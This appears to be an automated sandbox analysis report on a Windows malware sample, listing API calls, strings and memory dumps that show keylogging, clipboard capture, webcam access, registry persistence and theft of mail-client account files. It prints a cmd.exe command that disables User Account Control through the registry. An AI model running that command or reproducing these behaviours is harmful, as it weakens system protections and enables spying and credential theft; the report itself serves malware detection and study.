• String ID: @)|$C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
• API String ID: 2506810119-2166363405
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000104), ref: 10014D25
• _free.LIBCMT ref: 10014DF0
• _free.LIBCMT ref: 10014DFA
Strings
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: @)|$C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
• API String ID: 2506810119-2166363405
APIs
  • Part of subcall function 02831E89: lstrlenW.KERNEL32(?,?,?,?,?,028310DF,?,?,?,00000000), ref: 02831E9A
  • Part of subcall function 02831E89: lstrcatW.KERNEL32(?,?,?,028310DF,?,?,?,00000000), ref: 02831EAC
  • Part of subcall function 02831E89: lstrlenW.KERNEL32(?,?,028310DF,?,?,?,00000000), ref: 02831EB3
  • Part of subcall function 02831E89: lstrlenW.KERNEL32(?,?,028310DF,?,?,?,00000000), ref: 02831EC8
  • Part of subcall function 02831E89: lstrcatW.KERNEL32(?,028310DF,?,028310DF,?,?,?,00000000), ref: 02831ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 0283122A
  • Part of subcall function 0283173A: _strlen.LIBCMT ref: 02831855
  • Part of subcall function 0283173A: _strlen.LIBCMT ref: 02831869
Strings
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 4036392271-1520055953
APIs
  • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
  • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
  • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
• __Init_thread_footer.LIBCMT ref: 0040AEA7
  • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
  • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                                                                                                                                                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                                                                                                                                                                                                                                                                                              • API String ID: 2974294136-4018440003
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: EventLocalTimewsprintf
                                                                                                                                                                                                                                                                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                                                                                                                                                              • API String ID: 1497725170-248792730
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                                                                                                                                                              • String ID: `AG
                                                                                                                                                                                                                                                                                                                              • API String ID: 1958988193-3058481221
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                                                                                                                                                              • String ID: 0$MsgWindowClass
                                                                                                                                                                                                                                                                                                                              • API String ID: 2877667751-2410386613
APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
• CloseHandle.KERNEL32(?), ref: 00406A0F
• CloseHandle.KERNEL32(?), ref: 00406A14
Strings
• C:\Windows\System32\cmd.exe, xrefs: 004069FB
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
• FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
• RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
• RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc$BG
• API String ID: 1818849710-2233081382
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02834AEA,?,?,02834A8A,?,02842238,0000000C,02834BBD,00000000,00000000), ref: 02834B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02834B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,02834AEA,?,?,02834A8A,?,02842238,0000000C,02834BBD,00000000,00000000,00000001,02832082), ref: 02834B8F
Strings
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10014BF2,00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002), ref: 10014C61
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10014C74
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,10014BF2,00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002), ref: 10014C97
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00000280), ref: 00404AF9
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                                                                                                                                                              • String ID: KeepAlive | Disabled
                                                                                                                                                                                                                                                                                                                              • API String ID: 2993684571-305739064
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                                                                                                                                                                                                                                                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                                                                                                                                                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                                                                                                                                                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                                                                                                                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                                                                                                                                                                              • API String ID: 3024135584-2418719853
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• Sleep.KERNEL32(00000000), ref: 00403E8A
  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
• API String ID: 3469354165-3547787478
APIs
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
• __alloca_probe_16.LIBCMT ref: 0044FF68
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
• GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
• __freea.LIBCMT ref: 0044FFD4
  • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 313313983-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 88201f02e49098e6f592975d0299b58774541eebf8c41212138823b53665fa5d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88201f02e49098e6f592975d0299b58774541eebf8c41212138823b53665fa5d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044E154
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
  • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
• _free.LIBCMT ref: 0044E1B0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
• Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
• Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
• Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0283715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0283717F
  • Part of subcall function 028356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02835702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 028371A5
• _free.LIBCMT ref: 028371B8
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 028371C7
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 185d1ed9ecef8144133741e770c7f690cc73314bd8b35b651e92b3f6daef2f2c
• Instruction ID: 59e168f4f6e7af8cf3df2d45ef85047e89952db11e0f1392821123788606edfe
• Opcode Fuzzy Hash: 185d1ed9ecef8144133741e770c7f690cc73314bd8b35b651e92b3f6daef2f2c
• Instruction Fuzzy Hash: 770188BFA066157B23231ABA5C48D7FAA6DDAC6E643140529BD04C7248EB70CC0185F5
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 1001962B
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001964E
